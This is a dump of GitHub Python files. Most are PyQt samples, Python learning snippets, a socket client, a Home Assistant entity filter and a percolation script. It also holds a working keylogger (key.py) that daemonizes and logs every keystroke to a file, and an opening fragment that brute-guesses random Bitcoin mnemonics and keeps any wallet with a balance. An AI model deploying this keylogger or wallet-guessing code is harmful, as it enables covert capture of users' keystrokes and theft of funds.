print(f'{argv[0]} -w <TYPE>\n\tWitness type. One of: \'p2sh-segwit\', \'segwit\' or \'legacy\' (default if -w not defined)')
print(f'{argv[0]} -k <SIZE>\n\tKey size. One of: \'128\' (default if -k not defined. 12 words), \'256\' (24 words), \'512\' or \'1024\'')
exit(0)
if '-w' in argv:
try:
witnesstype = argv[argv.index('-w') + 1]
except IndexError:
print(f'Witness value error: -w without value defined')
exit(0)
if witnesstype not in ['p2sh-segwit', 'segwit', 'legacy']:
print(f'Witness type error: Unknown {witnesstype}')
exit(0)
else:
witnesstype = 'p2sh-segwit'
if '-k' in argv:
try:
keysize = int(argv[argv.index('-k') + 1])
except IndexError:
print(f'Key size error: -k without value defined')
exit(0)
if keysize not in [128, 256, 512, 1024]:
print(f'Key size error: Unknown {keysize}')
exit(0)
else:
keysize = 256
walletname = "Wallet_Test"
print(f'Configuration: witness type: [{witnesstype}] and key size: [{keysize}] (wallet name: {walletname})')
passphrase = Mnemonic().generate(strength=keysize)
w = HDWallet.create(walletname, keys=passphrase, witness_type=witnesstype, network='bitcoin')
w.scan()
balance = w.balance_update_from_serviceprovider()
print(f'Passphrase: [{passphrase}] Balance: [{balance}]')
if(balance == 0):
wallet_delete(walletname)
else:
print(f'Wallet [{walletname}] NOT DELETED from DATABASE!')
if __name__ == '__main__':
main(argv)
exit(0)
``` |
{
"source": "a2gs/keylogger",
"score": 3
} |
#### File: a2gs/keylogger/key.py
```python
from os import fork, umask, setsid, chdir
from sys import exit
from pynput.keyboard import Key, Listener
kbuf = ""
def d():
if fork() > 0:
exit(0)
chdir('./')
setsid()
umask(0)
# map each special key to the label written to the log; every hit also flushes via wl()
SPECIAL_KEYS = {
Key.enter: 'ENTER', Key.esc: 'ESC', Key.backspace: 'BACKSPACE',
Key.caps_lock: 'CAPSLOCK',
Key.ctrl: 'L_CTRL', Key.ctrl_l: 'L_CTRL', Key.ctrl_r: 'R_CTRL',
Key.alt: 'L_ALT', Key.alt_l: 'L_ALT', Key.alt_r: 'R_ALT', Key.alt_gr: 'R_ALT',
Key.delete: 'DEL', Key.down: 'DOWN', Key.end: 'END', Key.home: 'HOME',
Key.left: 'LEFT', Key.page_down: 'P_DOWN', Key.page_up: 'P_UP', Key.right: 'RIGHT',
Key.shift: 'L_SHIFT', Key.shift_l: 'L_SHIFT', Key.shift_r: 'R_SHIFT',
Key.tab: 'TAB', Key.up: 'UP', Key.insert: 'INSERT', Key.menu: 'MENU',
Key.num_lock: 'NUMLOCK', Key.pause: 'PAUSE', Key.print_screen: 'SYSRQ',
Key.scroll_lock: 'SCROLLLOCK',
Key.f1: 'F1', Key.f2: 'F2', Key.f3: 'F3', Key.f4: 'F4', Key.f5: 'F5',
Key.f6: 'F6', Key.f7: 'F7', Key.f8: 'F8', Key.f9: 'F9', Key.f10: 'F10',
Key.f11: 'F11', Key.f12: 'F12', Key.f13: 'F13', Key.f14: 'F14', Key.f15: 'F15',
Key.f16: 'F16', Key.f17: 'F17', Key.f18: 'F18', Key.f19: 'F19', Key.f20: 'F20',
Key.cmd: 'L_META', Key.cmd_l: 'L_META', Key.cmd_r: 'R_META',
Key.media_play_pause: 'PLAYPAUSE', Key.media_volume_mute: 'MUTE',
Key.media_volume_down: 'VOLDOWN', Key.media_volume_up: 'VOLUP',
Key.media_previous: 'PREVSONG', Key.media_next: 'NEXTSONG'
}
def kp(k):
global kbuf
if k == Key.space:
kbuf += ' '
wl()
elif k in SPECIAL_KEYS:
kbuf += ' ' + SPECIAL_KEYS[k] + '\n'
wl()
else:
try:
kbuf += k.char # printable characters accumulate until the next flush
except AttributeError:
pass
def wl():
global kbuf
f = open('log.txt', 'a')
f.write(kbuf)
f.close()
kbuf = ""
d()
with Listener(on_press = kp) as listener:
listener.join()
``` |
{
"source": "a2gs/PyQT",
"score": 3
} |
#### File: a2gs/PyQT/box-layout.py
```python
from PyQt5.QtWidgets import (QApplication, QComboBox, QDialog, QDialogButtonBox, QFormLayout, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLineEdit, QMenu, QMenuBar, QPushButton, QSpinBox, QTextEdit, QVBoxLayout)
import sys
class Dialog(QDialog):
# NumGridRows = 3
# NumButtons = 4
def __init__(self):
super(Dialog, self).__init__()
b1=QPushButton("Button1")
b2=QPushButton("Button2")
b3=QPushButton("Button3")
b4=QPushButton("Button4")
mainLayout = QVBoxLayout()
mainLayout.addWidget(b1)
mainLayout.addWidget(b2)
mainLayout.addWidget(b3)
mainLayout.addWidget(b4)
self.setLayout(mainLayout)
self.setWindowTitle("Form Layout - pythonspot.com")
if __name__ == '__main__':
app = QApplication(sys.argv)
dialog = Dialog()
sys.exit(dialog.exec_())
```
#### File: a2gs/PyQT/colors.py
```python
import sys
from PyQt5.QtWidgets import QApplication, QWidget, QMainWindow, QLabel
from PyQt5.QtGui import QPainter, QColor, QPen
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt
import random
class App(QMainWindow):
def __init__(self):
super().__init__()
self.title = 'PyQt rectangle colors - pythonspot.com'
self.left = 10
self.top = 10
self.width = 440
self.height = 280
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
# Set window background color
self.setAutoFillBackground(True)
p = self.palette()
p.setColor(self.backgroundRole(), Qt.white)
self.setPalette(p)
# Add paint widget and paint
self.m = PaintWidget(self)
self.m.move(0,0)
self.m.resize(self.width,self.height)
self.show()
class PaintWidget(QWidget):
def paintEvent(self, event):
qp = QPainter(self)
qp.setPen(Qt.black)
size = self.size()
# Colored rectangles
qp.setBrush(QColor(200, 0, 0))
qp.drawRect(0, 0, 100, 100)
qp.setBrush(QColor(0, 200, 0))
qp.drawRect(100, 0, 100, 100)
qp.setBrush(QColor(0, 0, 200))
qp.drawRect(200, 0, 100, 100)
# Color Effect
for i in range(0,100):
qp.setBrush(QColor(i*10, 0, 0))
qp.drawRect(10*i, 100, 10, 32)
qp.setBrush(QColor(i*10, i*10, 0))
qp.drawRect(10*i, 100+32, 10, 32)
qp.setBrush(QColor(i*2, i*10, i*1))
qp.drawRect(10*i, 100+64, 10, 32)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
```
#### File: a2gs/PyQT/spacing.py
```python
import sys
from PyQt5.QtWidgets import QApplication, QCheckBox, QTabWidget, QVBoxLayout, QWidget, QFormLayout, QLineEdit, QLabel
class Window(QWidget):
def __init__(self):
super().__init__()
self.setWindowTitle("QFormLayout Example")
self.resize(270, 110)
# Create a QHBoxLayout instance
layout = QFormLayout()
# Add widgets to the layout
layout.setVerticalSpacing(30)
layout.addRow("Name:", QLineEdit())
layout.addRow("Job:", QLineEdit())
emailLabel = QLabel("Email:")
layout.addRow(emailLabel, QLineEdit())
# Set the layout on the application's window
self.setLayout(layout)
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec_())
```
#### File: a2gs/PyQT/window.py
```python
import sys
from PyQt5.QtWidgets import QApplication, QWidget
from PyQt5.QtGui import QIcon
class App(QWidget):
def __init__(self):
super().__init__()
self.title = 'PyQt5 simple window - pythonspot.com'
self.left = 10
self.top = 10
self.width = 640
self.height = 480
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.show()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
``` |
{
"source": "a2gs/pythonStudy",
"score": 3
} |
#### File: a2gs/pythonStudy/cProfile_and_timeit_sample.py
```python
import cProfile
import timeit
def func(x):
print(f"Hello {x:d}")
numbers = []
start = 0
for i in range(x):
print(i)
numbers.append(i)
cProfile.run('func(100000)')
#Or: print(timeit.timeit('func(100000)', globals=globals(), number=1))
print(timeit.timeit('func(100000)', setup="from __main__ import func", number=1))
```
#### File: pythonStudy/decorator/dec2_simple_decorator.py
```python
def my_decorator(func):
def wrapper():
print("Something is happening before the function is called.")
func()
print("Something is happening after the function is called.")
return wrapper
@my_decorator
def say_whee():
print("Whee!")
say_whee()
```
#### File: pythonStudy/decorator/dec4_return.py
```python
from decorators import do_twice, do_something_and_return_a_value
@do_something_and_return_a_value
def greet(name):
"""
function greet() inside dec4 sample
"""
print(f"Hello {name}")
return 42
str = greet("World")
print(str)
print(f"\n---(continues to dec5)-------------\nFunc name: {greet.__name__}")
print("help(greep) output (is not, help() output from decorator): ")
help(greet)
```
#### File: pythonStudy/decorator/dec5_functools.py
```python
from decorators import do_something_functools
@do_something_functools
def greet(name):
"""
function greet() inside dec5 sample
"""
print(f"Hello {name}")
return 42
str = greet("World")
print(str)
print(f"\n---(functools facility)-------------\nFunc name: {greet.__name__}")
print("help(greet) output: ")
help(greet)
```
#### File: pythonStudy/decorator/full_sample_timer.py
```python
from decorators import timer
@timer
def waste_some_time(num_times):
for _ in range(num_times):
sum([i**2 for i in range(10000)])
waste_some_time(1)
waste_some_time(999)
```
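The `decorators` module imported by these samples is not included in this dump. Sketches consistent with how the samples use it: `do_something_and_return_a_value` must forward the return value while clobbering metadata (what dec4 demonstrates), `do_something_functools` must preserve `__name__` and `__doc__` (dec5), and `timer` must report elapsed time (full_sample_timer). The bodies and messages are my assumptions:
```python
import functools
import time

def do_something_and_return_a_value(func):
    # plain wrapper: greet.__name__ becomes 'wrapper', as dec4 points out
    def wrapper(*args, **kwargs):
        print("before the call")
        value = func(*args, **kwargs)
        print("after the call")
        return value
    return wrapper

def do_something_functools(func):
    @functools.wraps(func)  # preserves __name__ and __doc__, as dec5 shows
    def wrapper(*args, **kwargs):
        print("before the call")
        value = func(*args, **kwargs)
        print("after the call")
        return value
    return wrapper

def timer(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        start = time.perf_counter()
        value = func(*args, **kwargs)
        print(f"Finished {func.__name__!r} in {time.perf_counter() - start:.4f} secs")
        return value
    return wrapper
```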
#### File: a2gs/pythonStudy/exception.py
```python
class myBaseException(Exception):
def __init__(self, errNum, errMsg):
self.err = errNum
self.msg = errMsg
class myExcept_1(myBaseException):
def __init__(self):
super().__init__(13, "except 1")
class myExcept_2(myBaseException):
def __init__(self):
super().__init__(8, "except 2")
def func(b):
if(b == 1):
raise myExcept_1
elif(b == 2):
raise myExcept_2
elif(b == 3):
return
try:
func(1)
except myExcept_1 as e:
print(f'Error number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Error number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done1\n----------------------------------------')
try:
func(2)
except myExcept_1 as e:
print(f'Error number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Error number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done2\n----------------------------------------')
try:
func(3)
except myExcept_1 as e:
print(f'Error number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Error number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
```
#### File: a2gs/pythonStudy/iterator.py
```python
class myIter:
def __init__(self, max = 0):
self.max = max
def __iter__(self):
self.n = 0
return self
def __next__(self):
if self.n <= self.max:
result = 2 ** self.n
self.n += 1
return result
else:
raise StopIteration
print('------')
for i in myIter(5):
print(i)
print('------\nITER()')
m = myIter(7)
mi = iter(m)
for i in range(10):
print(next(mi)) # myIter(7) yields 8 values (2**0..2**7); the 9th next() raises StopIteration
```
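The same protocol can be expressed as a generator function, which supplies `__iter__`/`__next__` implicitly. An equivalent sketch:
```python
def my_gen(max=0):
    n = 0
    while n <= max:
        yield 2 ** n
        n += 1

for i in my_gen(5):
    print(i)   # same output as the myIter(5) loop above
```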
#### File: a2gs/pythonStudy/main.py
```python
import main2
import module111
from module222.m222func import m2func
import module222 #just for 'print(module222.__doc__)' line
class sample():
def __init__(self, _x = 0, _y = ''):
self.xxx = _x
self.yyy = _y
def _get_x(self):
return self.xxx
def _get_y(self):
return self.yyy
def _set_x(self, _x = 0):
self.xxx = _x
def _set_y(self, _y = ''):
self.yyy = _y
x = property(_get_x, _set_x)
y = property(_get_y, _set_y)
def main():
print('0 ----------------')
a = sample()
b = sample()
c = sample(10, 'abc')
print('1 ----------------')
b.x = 13
b.y = 'xyz'
print(f'Main function: a = [{a.x}, {a.y!r}] | b = [{b.x}, {b.y!r}] | b = [{c.x}, {c.y!r}]')
print('2 ----------------')
m1cinst = module111.m1c()
print(module111.__doc__)
print('-')
print(m1cinst.__doc__)
print('-')
print(dir(m1cinst))
print('3 ----------------')
print(module222.__doc__) #only possible importing all module ('from module222.m222func import m2func' didn't help): 'import module222'
print('-')
print(m2func.__doc__)
print('-')
m2func()
if __name__ == "__main__":
print(f'The name of module two is {__name__}')
main()
```
#### File: pythonStudy/module222/m222func.py
```python
def m2func():
"function m2func() documentation"
print("inside m2func")
```
#### File: pythonStudy/pyTCPClientServer/cli_envelop_thread_after_accept.py
```python
import socket
HEADER = 64
PORT = 5050
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
#SERVER = "192.168.1.26"
SERVER = "127.0.1.1"
ADDR = (SERVER, PORT)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(ADDR)
def send(msg):
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
client.send(send_length)
client.send(message)
print(client.recv(2048).decode(FORMAT))
send("Hello World!")
input()
send("Hello Everyone!")
input()
send("Hello Tim!")
send(DISCONNECT_MESSAGE)
``` |
{
"source": "a2gs/remoteApp",
"score": 3
} |
#### File: remoteApp/client/remoteAppClientCfg.py
```python
import configparser
class racCfg():
cfgs = None
cfgFile = ''
def __init__(self, fileCfg : str):
self.cfgFile = fileCfg
self.cfgs = configparser.ConfigParser()
self.load()
def get(self, section : str, key : str) -> [bool, None]:
try:
value = self.cfgs[section][key]
except KeyError:
return [False, None]
return [True, value]
def set(self, section : str, key : str, value):
try:
self.cfgs.add_section(section)
except configparser.DuplicateSectionError:
pass
self.cfgs.set(section, key, value)
def save(self):
with open(self.cfgFile, 'w') as c:
self.cfgs.write(c)
def load(self):
self.cfgs.read(self.cfgFile)
``` |
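A usage sketch of `racCfg`; the section and key names here are illustrative, not the client's real config schema:
```python
from remoteAppClientCfg import racCfg

cfg = racCfg('remoteAppClient.cfg')
cfg.set('NETWORK', 'host', '127.0.0.1')
cfg.set('NETWORK', 'port', '5050')
cfg.save()                        # persists to remoteAppClient.cfg

ok, host = cfg.get('NETWORK', 'host')
if ok:
    print(f'connecting to {host}')
```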
{
"source": "a2hsh/udacity-fsnd-capstone",
"score": 3
} |
#### File: app/database/models.py
```python
from app import db
'''
Actors
Should have unique names
should have age and gender
'''
class Actor(db.Model):
__tablename__ = 'actors'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.String(50), unique=True, nullable=False)
age = db.Column(db.Integer(), nullable=False)
gender = db.Column(db.String(6), nullable=False)
movies = db.relationship('Movie', secondary='actor_movies', backref='actors',
lazy=True)
'''
insert()
inserts a new model into the database
the model must have a unique name
the model must have a unique id or null id
EXAMPLE
actor = Actor(name=req_name, age=req_age, gender=req_gender)
actor.insert()
'''
def insert(self):
db.session.add(self)
db.session.commit()
'''
delete()
deletes a model from the database
the model must exist in the database
EXAMPLE
actor = Actor.query.filter(Actor.id == id).one_or_none()
actor.delete()
'''
def delete(self):
db.session.delete(self)
db.session.commit()
'''
update()
updates a model in the database
the model must exist in the database
EXAMPLE
actor = Actor.query.filter(Actor.id == id).one_or_none()
actor.name = '<NAME>'
actor.update()
'''
def update(self):
db.session.commit()
'''
format()
returns a json representation of the actor model
'''
def format(self):
return {
'id': self.id,
'name': self.name,
'age': self.age,
'gender': self.gender,
'movies': [{'id': movie.id, 'title': movie.title} for movie in self.movies]
}
class Movie(db.Model):
__tablename__ = 'movies'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), unique=True, nullable=False)
release_date = db.Column(db.String(50), nullable=False)
'''
insert()
inserts a new model into the database
the model must have a unique title
the model must have a unique id or null id
EXAMPLE
movie = Movie(title=req_title)
movie.insert()
'''
def insert(self):
db.session.add(self)
db.session.commit()
'''
delete()
deletes a model from the database
the model must exist in the database
EXAMPLE
movie = Movie.query.filter(Movie.id == id).one_or_none()
movie.delete()
'''
def delete(self):
db.session.delete(self)
db.session.commit()
'''
update()
updates a model in the database
the model must exist in the database
EXAMPLE
movie = Movie.query.filter(Movie.id == id).one_or_none()
movie.title = 'Sully'
movie.update()
'''
def update(self):
db.session.commit()
'''
format()
returns a json representation of the movie model
'''
def format(self):
return {
'id': self.id,
'title': self.title,
'release_date': self.release_date,
'actors': [{'id': actor.id, 'name': actor.name} for actor in self.actors]
}
class ActorMovies(db.Model):
__tablename__ = 'actor_movies'
actor_id = db.Column(db.Integer, db.ForeignKey(
'actors.id', ondelete='CASCADE'), primary_key=True)
movie_id = db.Column(db.Integer, db.ForeignKey(
'movies.id', ondelete='CASCADE'), primary_key=True)
```
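A usage sketch of the many-to-many relationship; run inside an app context, and it assumes the tables already exist via migrations (sample values are illustrative):
```python
from app import create_app
from app.database.models import Actor, Movie

app = create_app('development')
with app.app_context():
    movie = Movie(title='Sully', release_date='2016-09-09')
    movie.insert()
    actor = Actor(name='Tom Hanks', age=64, gender='male')
    actor.movies.append(movie)   # populates the actor_movies association table
    actor.insert()
    print(actor.format())
```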
#### File: udacity-fsnd-capstone/app/__init__.py
```python
import os
from flask import Flask, jsonify, redirect, request, render_template
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from os import environ
# Instantiating global objects and variables
db = SQLAlchemy()
migrate = Migrate()
def create_app(config=environ.get('FLASK_CONFIG') or 'development'):
# create and configure the app
app = Flask(__name__)
if config == 'development':
app.config.from_object('config.DevConfig')
elif config == 'production':
app.config.from_object('config.ProdConfig')
elif config == 'testing':
app.config.from_object('config.TestConfig')
else:
raise EnvironmentError(
'Please specify a valid configuration profile in your FLASK_CONFIG environment variable for the application. Possible choices are `development`, `testing`, or `production`')
    # initializing application extensions
db.init_app(app)
migrate.init_app(app, db)
    # bind all extensions to the app instance
with app.app_context():
# importing routes blueprint
from .main import main
# register blueprints
app.register_blueprint(main)
# Public ROUTES
'''
endpoint
GET /
a public endpoint
use this endpoint from a browser to login to your account and get an access token for the API
'''
@app.route('/')
def redirect_to_login():
# redirect to Auth0 login page
return redirect(f'https://{environ.get("AUTH0_DOMAIN")}/authorize?audience={environ.get("AUTH0_AUDIENCE")}&response_type=token&client_id={environ.get("AUTH0_CLIENT_ID")}&redirect_uri={environ.get("AUTH0_REDIRECT_URI")}')
@app.route('/token', methods=['GET'])
    def parse_token():
if 'access_token' in request.args:
return request.args.get('access_token')
else:
return render_template('token.html')
# force json errors for all endpoints
from werkzeug.exceptions import HTTPException
@app.errorhandler(Exception)
def other_errors_handler(error):
return jsonify({
'success': False,
'code': error.code,
'message': error.name
}), error.code
return app
```
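A minimal entry-point sketch for the factory above (the `run.py` module name is an assumption, not part of the source):
```python
# run.py -- illustrative entry point for the application factory (assumed)
from app import create_app

app = create_app('development')

if __name__ == '__main__':
    app.run()
```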
#### File: app/main/errors.py
```python
from . import main
from ..auth.auth import AuthError
from flask import abort, jsonify
from werkzeug.exceptions import HTTPException
# error handlers
'''
error handler for authorization errors
'''
@main.errorhandler(AuthError)
def authorization_error(error):
return jsonify({
'success': False,
'code': error.status_code,
'message': error.error
}), error.status_code
'''
error handler for internal server errors
'''
@main.errorhandler(500)
def internal_server_error(error):
return jsonify({
'success': False,
'code': 500,
'message': 'internal server error'
}), 500
'''
error handler for all other errors
'''
```
#### File: app/main/__init__.py
```python
from flask import Blueprint, jsonify, request, redirect, render_template
from flask_cors import CORS
from os import environ
# initializing the blueprint
main = Blueprint('main', __name__)
CORS(main, resources={r'*': {'origins': '*'}})
@main.after_request
def after_request(response):
'''defining extra headers'''
response.headers.add('Access-Control-Allow-Headers',
'Content-Type,Authorization,true')
response.headers.add('Access-Control-Allow-Methods',
'GET,PATCH,POST,DELETE,OPTIONS')
response.headers.add('Content-Type', 'application/json')
return response
# importing routes
from . import actors, movies, errors
``` |
{
"source": "a2htray/sudoku-cli",
"score": 2
} |
#### File: src/commands/cmd_generate.py
```python
import click
from src.cli import pass_context
from src.abs.game import Game
@click.command('generate', short_help='Show a view of 9*9 sudoku map')
@click.option('--coordinate/--no-coordinate', default=True)
@click.option('--check/--no-check', default=True)
@click.option('--mode', type=click.Choice(['easy', 'medium', 'hard', 'extreme']), default='medium')
@pass_context
def cli(ctx, coordinate, check, mode):
game = Game(
with_coordinate=coordinate, step_check=check, mode=mode,
random=6, mutiple=18, lmutiple=8)
game.fill_random()
game.flush()
game.gloop()
``` |
{
"source": "a2i2/hassio-to-pubsub",
"score": 2
} |
#### File: src/hassio-to-pubsub/entityfilter.py
```python
import fnmatch
import re
from typing import Callable
CONF_INCLUDE_DOMAINS = "include_domains"
CONF_INCLUDE_ENTITY_GLOBS = "include_entity_globs"
CONF_INCLUDE_ENTITIES = "include_entities"
CONF_EXCLUDE_DOMAINS = "exclude_domains"
CONF_EXCLUDE_ENTITY_GLOBS = "exclude_entity_globs"
CONF_EXCLUDE_ENTITIES = "exclude_entities"
CONF_ENTITY_GLOBS = "entity_globs"
def split_entity_id(entity_id):
"""Split a state entity ID into domain and object ID."""
return entity_id.split(".", 1)
def convert_filter(config):
"""Convert the filter schema into a filter."""
filt = generate_filter(
config[CONF_INCLUDE_DOMAINS],
config[CONF_INCLUDE_ENTITIES],
config[CONF_EXCLUDE_DOMAINS],
config[CONF_EXCLUDE_ENTITIES],
config[CONF_INCLUDE_ENTITY_GLOBS],
config[CONF_EXCLUDE_ENTITY_GLOBS],
)
setattr(filt, "config", config)
setattr(filt, "empty_filter", sum(len(val) for val in config.values()) == 0)
return filt
def _glob_to_re(glob):
"""Translate and compile glob string into pattern."""
return re.compile(fnmatch.translate(glob))
def _test_against_patterns(patterns, entity_id):
"""Test entity against list of patterns, true if any match."""
for pattern in patterns:
if pattern.match(entity_id):
return True
return False
# It's safe since we don't modify it. And None causes typing warnings
# pylint: disable=dangerous-default-value
def generate_filter(
include_domains,
include_entities,
exclude_domains,
exclude_entities,
include_entity_globs = [],
exclude_entity_globs = [],
):
"""Return a function that will filter entities based on the args."""
include_d = set(include_domains)
include_e = set(include_entities)
exclude_d = set(exclude_domains)
exclude_e = set(exclude_entities)
include_eg_set = set(include_entity_globs)
exclude_eg_set = set(exclude_entity_globs)
include_eg = list(map(_glob_to_re, include_eg_set))
exclude_eg = list(map(_glob_to_re, exclude_eg_set))
have_exclude = bool(exclude_e or exclude_d or exclude_eg)
have_include = bool(include_e or include_d or include_eg)
def entity_included(domain, entity_id):
"""Return true if entity matches inclusion filters."""
return (
entity_id in include_e
or domain in include_d
or bool(include_eg and _test_against_patterns(include_eg, entity_id))
)
def entity_excluded(domain, entity_id):
"""Return true if entity matches exclusion filters."""
return (
entity_id in exclude_e
or domain in exclude_d
or bool(exclude_eg and _test_against_patterns(exclude_eg, entity_id))
)
# Case 1 - no includes or excludes - pass all entities
if not have_include and not have_exclude:
return lambda entity_id: True
# Case 2 - includes, no excludes - only include specified entities
if have_include and not have_exclude:
def entity_filter_2(entity_id):
"""Return filter function for case 2."""
domain = split_entity_id(entity_id)[0]
return entity_included(domain, entity_id)
return entity_filter_2
# Case 3 - excludes, no includes - only exclude specified entities
if not have_include and have_exclude:
def entity_filter_3(entity_id):
"""Return filter function for case 3."""
domain = split_entity_id(entity_id)[0]
return not entity_excluded(domain, entity_id)
return entity_filter_3
# Case 4 - both includes and excludes specified
# Case 4a - include domain or glob specified
# - if domain is included, pass if entity not excluded
# - if glob is included, pass if entity and domain not excluded
# - if domain and glob are not included, pass if entity is included
# note: if both include domain matches then exclude domains ignored.
# If glob matches then exclude domains and glob checked
if include_d or include_eg:
def entity_filter_4a(entity_id):
"""Return filter function for case 4a."""
domain = split_entity_id(entity_id)[0]
if domain in include_d:
return not (
entity_id in exclude_e
or bool(
exclude_eg and _test_against_patterns(exclude_eg, entity_id)
)
)
if _test_against_patterns(include_eg, entity_id):
return not entity_excluded(domain, entity_id)
return entity_id in include_e
return entity_filter_4a
# Case 4b - exclude domain or glob specified, include has no domain or glob
# In this one case the traditional include logic is inverted. Even though an
# include is specified since its only a list of entity IDs its used only to
# expose specific entities excluded by domain or glob. Any entities not
# excluded are then presumed included. Logic is as follows
# - if domain or glob is excluded, pass if entity is included
# - if domain is not excluded, pass if entity not excluded by ID
if exclude_d or exclude_eg:
def entity_filter_4b(entity_id):
"""Return filter function for case 4b."""
domain = split_entity_id(entity_id)[0]
if domain in exclude_d or (
exclude_eg and _test_against_patterns(exclude_eg, entity_id)
):
return entity_id in include_e
return entity_id not in exclude_e
return entity_filter_4b
# Case 4c - neither include or exclude domain specified
# - Only pass if entity is included. Ignore entity excludes.
return lambda entity_id: entity_id in include_e
``` |
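To see the case analysis in action, here is a small sketch that lands in case 4a (an include domain plus exclude lists); the entity IDs are made up for illustration:
```python
# Illustrative filter: "light" domain included, one light excluded by ID,
# one sensor included by ID, debug entities excluded by glob.
entity_filter = generate_filter(
    include_domains=["light"],
    include_entities=["sensor.kitchen_temperature"],
    exclude_domains=[],
    exclude_entities=["light.garage"],
    include_entity_globs=[],
    exclude_entity_globs=["*.debug_*"],
)
assert entity_filter("light.living_room")           # included by domain
assert not entity_filter("light.garage")            # excluded by entity ID
assert entity_filter("sensor.kitchen_temperature")  # included by entity ID
assert not entity_filter("sensor.outdoor")          # not included anywhere
```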
{
"source": "a2i2/opendigitaltwins-surveillance",
"score": 3
} |
#### File: opendigitaltwins-surveillance/Scripts/percolation.py
```python
import sys
import json
import random
from heapq import heappush, heappop
from statistics import mean
from collections import defaultdict
class Network:
# TODO: Improve efficiency by converting
# string identifiers to ints
def __init__(self, network_json):
self.nodes = network_json["nodes"]
self.edges = network_json["edges"]
# (from, to) -> edge dict
self.edge_index = {}
# from -> [edge]
self.neighbours_index = defaultdict(set)
for e in self.edges:
a = e["from"]
b = e["to"]
# assume at most one edge from a to b
assert (a, b) not in self.edge_index
self.edge_index[(a, b)] = e
self.neighbours_index[a].add(b)
def get_edge(self, a, b):
"""Gets edge, including all attributes"""
return self.edge_index[a, b]
def get_edge_keys(self):
return self.edge_index.keys()
def neighbours(self, a):
"""Gets set of nodes with edge from a"""
return self.neighbours_index[a]
def get_nodes(self):
"""Gets list of nodes"""
return self.nodes
class Perc:
def __init__(self, network, rho, zs, budget):
self.network = network
self.rho = rho
self.zs = zs
self.budget = budget
def q(self, a, b):
e = self.network.get_edge(a, b)
return e["levelAvail"]
def m(self, a, b):
e = self.network.get_edge(a, b)
return e["priv"]
def f(self, a, b):
e = self.network.get_edge(a, b)
return 1 - e["privAvail"]
def z(self, a, b):
return self.zs[(a, b)]
def b_od(self, o, d):
# assume constant budget
return self.budget
def f_od(self, o, d):
# assume equal flow demand between all o,d pairs
return 1
# this is the most important function to define (rest will follow)
def c_ab(self, a, b):
if self.q(a, b) > self.rho and self.z(a, b) < self.f(a, b):
return 0
if self.q(a, b) > self.rho and self.z(a, b) >= self.f(a, b):
return self.m(a, b)
return float("inf")
def c_star_od(self, o, d, budget=float("inf")):
# Apply Dijkstra's algorithm to find minimum cost path from o to d
# TODO: Find more efficient implementation at scale (e.g. could use approximate solution)
if budget <= 0:
return None
# Based on https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm#Using_a_priority_queue
dist = {}
q = []
dist[o] = 0
heappush(q, (0, o))
while q:
dist_u, u = heappop(q)
if u == d:
# We found the target node
return dist_u
if dist[u] < dist_u:
# Have already visited this node before.
# Is a stale entry with a greater tentative distance.
continue
for v in self.network.neighbours(u):
# TODO: cache c_ab
# (computed once per run of Dijkstra's alg)
alt = dist_u + self.c_ab(u, v)
if alt < dist.get(v, budget):
dist[v] = alt
# The old tentative distance (if any) will be left in
# the list, but will be ignored as a stale entry
# during processing loop.
heappush(q, (alt, v))
# Target node not reachable (or has cost >= budget)
return None
def r_od(self, o, d):
# Pass budget to c_star_od to allow terminating search early
return 0 if self.c_star_od(o, d, self.b_od(o, d)) is None else 1
def UD(self):
flow_unaffected = 0
flow_demand = 0
for o in self.network.get_nodes():
for d in self.network.get_nodes():
flow_unaffected += self.f_od(o, d) * self.r_od(o, d)
flow_demand += self.f_od(o, d)
return flow_unaffected / flow_demand
def alpha(network, budget, integral_steps=4, rand_steps=1000):
# Example of integral_steps=4
# 0 0.25 0.5 0.75 1
# V V V V V
# [0.125,0.375,0.625,0.875]
delta = 1/integral_steps
integral = 0
for step in range(integral_steps):
rho = delta * step + delta/2
UD_rho = []
for _ in range(rand_steps):
            # TODO: use a seed for repeatability
zs = {
(i, j): random.random()
for (i, j) in network.get_edge_keys()
}
perc = Perc(network, rho, zs, budget)
UD_rho.append(perc.UD())
E_UD_rho = mean(UD_rho)
integral += E_UD_rho * delta
return integral
def percolation(network_json):
network = Network(network_json)
budget = 10 # bits of entropy
a = alpha(network, budget)
results = {
"alpha": a
}
return results
if __name__ == "__main__":
if not len(sys.argv) > 1:
        raise ValueError("needs network as first argument")
network_file = sys.argv[1]
with open(network_file, 'r') as f:
network_json = json.load(f)
results = percolation(network_json)
print(json.dumps(results, indent=4))
``` |
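The script only reads `nodes` plus the `from`, `to`, `levelAvail`, `priv`, and `privAvail` attributes of each edge, so a hand-made network is enough to exercise it. A minimal sketch (all attribute values are illustrative):
```python
# Illustrative two-node network; all attribute values are made up.
toy_network = {
    "nodes": ["a", "b"],
    "edges": [
        {"from": "a", "to": "b", "levelAvail": 0.9, "priv": 2, "privAvail": 0.5},
        {"from": "b", "to": "a", "levelAvail": 0.9, "priv": 2, "privAvail": 0.5},
    ],
}
print(percolation(toy_network))  # prints {"alpha": <estimated value>}
```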
